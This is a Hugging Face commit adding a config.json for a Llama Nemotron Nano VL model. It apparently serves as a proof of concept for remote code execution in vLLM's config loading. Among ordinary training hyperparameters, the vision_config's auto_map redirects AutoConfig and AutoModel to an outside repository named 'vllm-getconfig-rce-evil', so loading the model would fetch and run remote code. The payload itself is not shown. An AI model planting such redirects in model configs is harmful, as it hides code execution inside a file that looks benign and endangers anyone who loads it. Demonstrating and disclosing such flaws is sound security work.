XManFromXlab commited on
Commit
212669a
·
verified ·
1 Parent(s): eff6786

Upload folder using huggingface_hub

Browse files
Files changed (1) hide show
  1. config.json +287 -0
config.json ADDED
@@ -0,0 +1,287 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "architectures": [
3
+ "Llama_Nemotron_Nano_VL"
4
+ ],
5
+ "max_sequence_length": 16384,
6
+ "downsample_ratio": 0.5,
7
+ "force_image_size": 512,
8
+ "patch_size": 16,
9
+ "eos_token_id": [
10
+ 128001,
11
+ 128008,
12
+ 128009
13
+ ],
14
+ "model_type": "Llama_Nemotron_Nano_VL",
15
+ "ps_version": "v2",
16
+ "template": "llama_3p1",
17
+ "torch_dtype": "bfloat16",
18
+ "image_tag_type": "internvl",
19
+ "vit_hidden_size": 1280,
20
+ "projector_hidden_size": 4096,
21
+ "llm_config": {
22
+ "architectures": [
23
+ "LlamaForCausalLM"
24
+ ],
25
+ "attention_bias": false,
26
+ "attention_dropout": 0.0,
27
+ "bos_token_id": 128000,
28
+ "eos_token_id": [
29
+ 128001,
30
+ 128008,
31
+ 128009
32
+ ],
33
+ "hidden_act": "silu",
34
+ "hidden_size": 4096,
35
+ "initializer_range": 0.02,
36
+ "intermediate_size": 14336,
37
+ "max_position_embeddings": 131072,
38
+ "mlp_bias": false,
39
+ "model_type": "llama",
40
+ "num_attention_heads": 32,
41
+ "num_hidden_layers": 32,
42
+ "num_key_value_heads": 8,
43
+ "pretraining_tp": 1,
44
+ "rms_norm_eps": 1e-05,
45
+ "rope_scaling": {
46
+ "factor": 8.0,
47
+ "low_freq_factor": 1.0,
48
+ "high_freq_factor": 4.0,
49
+ "original_max_position_embeddings": 8192,
50
+ "rope_type": "llama3"
51
+ },
52
+ "rope_theta": 500000.0,
53
+ "tie_word_embeddings": false,
54
+ "torch_dtype": "bfloat16",
55
+ "transformers_version": "4.42.3",
56
+ "use_cache": true,
57
+ "vocab_size": 128512
58
+ },
59
+ "vision_config": {
60
+ "auto_map": {
61
+ "AutoConfig": "XManFromXlab/vllm-getconfig-rce-evil--hf_model.RADIOConfig",
62
+ "AutoModel": "XManFromXlab/vllm-getconfig-rce-evil--hf_model.RADIOModel"
63
+ },
64
+ "adaptor_configs": {},
65
+ "adaptor_names": null,
66
+ "architectures": [
67
+ "RADIOModel"
68
+ ],
69
+ "args": {
70
+ "aa": null,
71
+ "amp": true,
72
+ "amp_dtype": "bfloat16",
73
+ "amp_impl": "native",
74
+ "aug_repeats": 0,
75
+ "aug_splits": 0,
76
+ "bn_eps": null,
77
+ "bn_momentum": null,
78
+ "cache_dir": null,
79
+ "channels_last": false,
80
+ "checkpoint_hist": 10,
81
+ "chk_keep_forever": 100,
82
+ "class_map": "",
83
+ "clip_grad": null,
84
+ "clip_mode": "norm",
85
+ "cls_token_per_teacher": true,
86
+ "coco_annotations_file": "/datasets/coco2017-adlsa/annotations/captions_val2017.json",
87
+ "coco_image_dir": "/datasets/coco2017-adlsa/val2017",
88
+ "color_jitter": 0.4,
89
+ "cooldown_epochs": 0,
90
+ "cpe_max_size": 2048,
91
+ "crd_loss": false,
92
+ "crd_loss_weight": 0.8,
93
+ "crop_pct": null,
94
+ "cutmix": 0.0,
95
+ "cutmix_minmax": null,
96
+ "dataset_download": false,
97
+ "debug_full_knn": false,
98
+ "decay_epochs": 90,
99
+ "decay_milestones": [
100
+ 90,
101
+ 180,
102
+ 270
103
+ ],
104
+ "decay_rate": 0.1,
105
+ "depchain": true,
106
+ "dist_bn": "reduce",
107
+ "dist_norm_weight": 0.0,
108
+ "distributed": true,
109
+ "drop": 0.0,
110
+ "drop_block": null,
111
+ "drop_connect": null,
112
+ "drop_path": null,
113
+ "dtype": "bfloat16",
114
+ "epoch_repeats": 0.0,
115
+ "eval": false,
116
+ "eval_metric": "knn_top1",
117
+ "eval_teacher": false,
118
+ "eval_teacher_only": false,
119
+ "eval_throughput": false,
120
+ "fast_norm": false,
121
+ "fd_loss_fn": "MSE",
122
+ "feature_normalization": "SHIP_NORM",
123
+ "feature_summarizer": "cls_token",
124
+ "feature_upscale_factor": null,
125
+ "force_new_wandb_id": false,
126
+ "force_spectral_reparam": true,
127
+ "freeze_bn": false,
128
+ "fsdp": false,
129
+ "fuser": "",
130
+ "gp": null,
131
+ "grad_accum_steps": 1,
132
+ "grad_checkpointing": false,
133
+ "head_init_bias": null,
134
+ "head_init_scale": null,
135
+ "head_warmup": 5,
136
+ "head_weight_decay": 0.001,
137
+ "hflip": 0.5,
138
+ "img_size": null,
139
+ "in_chans": null,
140
+ "initial_checkpoint": null,
141
+ "input_size": null,
142
+ "interpolation": "",
143
+ "layer_decay": null,
144
+ "local_rank": 0,
145
+ "log_interval": 50,
146
+ "log_mlflow": false,
147
+ "log_wandb": true,
148
+ "loss_auto_balance": false,
149
+ "lr_base": 0.1,
150
+ "lr_base_scale": "",
151
+ "lr_base_size": 256,
152
+ "lr_cycle_decay": 0.5,
153
+ "lr_cycle_limit": 1,
154
+ "lr_cycle_mul": 1.0,
155
+ "lr_k_decay": 1.0,
156
+ "lr_noise": null,
157
+ "lr_noise_pct": 0.67,
158
+ "lr_noise_std": 1.0,
159
+ "mean": null,
160
+ "mesa": false,
161
+ "min_lr": 0,
162
+ "mixup": 0.0,
163
+ "mixup_mode": "batch",
164
+ "mixup_off_epoch": 0,
165
+ "mixup_prob": 1.0,
166
+ "mixup_switch_prob": 0.5,
167
+ "mlp_hidden_size": 1520,
168
+ "mlp_num_inner": 3,
169
+ "mlp_version": "v2",
170
+ "model": "vit_huge_patch16_224",
171
+ "model_kwargs": {},
172
+ "model_norm": false,
173
+ "momentum": 0.9,
174
+ "no_aug": false,
175
+ "no_ddp_bb": true,
176
+ "no_prefetcher": false,
177
+ "no_resume_opt": false,
178
+ "num_classes": null,
179
+ "opt_betas": null,
180
+ "opt_eps": null,
181
+ "patience_epochs": 10,
182
+ "pin_mem": false,
183
+ "prefetcher": true,
184
+ "pretrained": false,
185
+ "rank": 0,
186
+ "ratio": [
187
+ 0.75,
188
+ 1.3333333333333333
189
+ ],
190
+ "recount": 1,
191
+ "recovery_interval": 0,
192
+ "register_multiple": 8,
193
+ "remode": "pixel",
194
+ "reprob": 0.0,
195
+ "reset_loss_state": false,
196
+ "resplit": false,
197
+ "save_images": false,
198
+ "scale": [
199
+ 0.5,
200
+ 1.0
201
+ ],
202
+ "sched": "cosine",
203
+ "seed": 42,
204
+ "smoothing": 0.1,
205
+ "spectral_heads": false,
206
+ "spectral_reparam": false,
207
+ "split_bn": false,
208
+ "start_epoch": null,
209
+ "std": null,
210
+ "stream_teachers": true,
211
+ "sync_bn": false,
212
+ "synchronize_step": false,
213
+ "teachers": [
214
+ {
215
+ "fd_normalize": false,
216
+ "feature_distillation": true,
217
+ "input_size": 378,
218
+ "model": "ViT-H-14-378-quickgelu",
219
+ "name": "clip",
220
+ "pretrained": "dfn5b",
221
+ "type": "open_clip",
222
+ "use_summary": true
223
+ },
224
+ {
225
+ "fd_normalize": false,
226
+ "feature_distillation": true,
227
+ "input_size": 378,
228
+ "model": "ViT-SO400M-14-SigLIP-384",
229
+ "name": "siglip",
230
+ "pretrained": "webli",
231
+ "type": "open_clip",
232
+ "use_summary": true
233
+ },
234
+ {
235
+ "fd_normalize": false,
236
+ "feature_distillation": true,
237
+ "input_size": 378,
238
+ "model": "dinov2_vitg14_reg",
239
+ "name": "dino_v2",
240
+ "type": "dino_v2",
241
+ "use_summary": true
242
+ },
243
+ {
244
+ "fd_normalize": false,
245
+ "feature_distillation": true,
246
+ "input_size": 1024,
247
+ "model": "vit-h",
248
+ "name": "sam",
249
+ "type": "sam",
250
+ "use_summary": false
251
+ }
252
+ ],
253
+ "torchcompile": null,
254
+ "torchscript": false,
255
+ "train_interpolation": "random",
256
+ "train_split": "train",
257
+ "tta": 0,
258
+ "use_coco": false,
259
+ "use_multi_epochs_loader": false,
260
+ "val_ema_only": false,
261
+ "val_split": "val",
262
+ "vflip": 0.0,
263
+ "vitdet_version": 1,
264
+ "wandb_entity": "",
265
+ "wandb_job_type": "",
266
+ "wandb_name": "",
267
+ "wandb_project": "",
268
+ "warmup_lr": 1e-05,
269
+ "warmup_prefix": false,
270
+ "worker_seeding": "all",
271
+ "workers": 8,
272
+ "world_size": 256
273
+ },
274
+ "feature_normalizer_config": null,
275
+ "inter_feature_normalizer_config": null,
276
+ "max_resolution": 2048,
277
+ "patch_size": 16,
278
+ "preferred_resolution": [
279
+ 768,
280
+ 768
281
+ ],
282
+ "torch_dtype": "bfloat16",
283
+ "version": "radio_v2.5-h",
284
+ "vitdet_window_size": null
285
+ },
286
+ "attn_implementation": "flash_attention_2"
287
+ }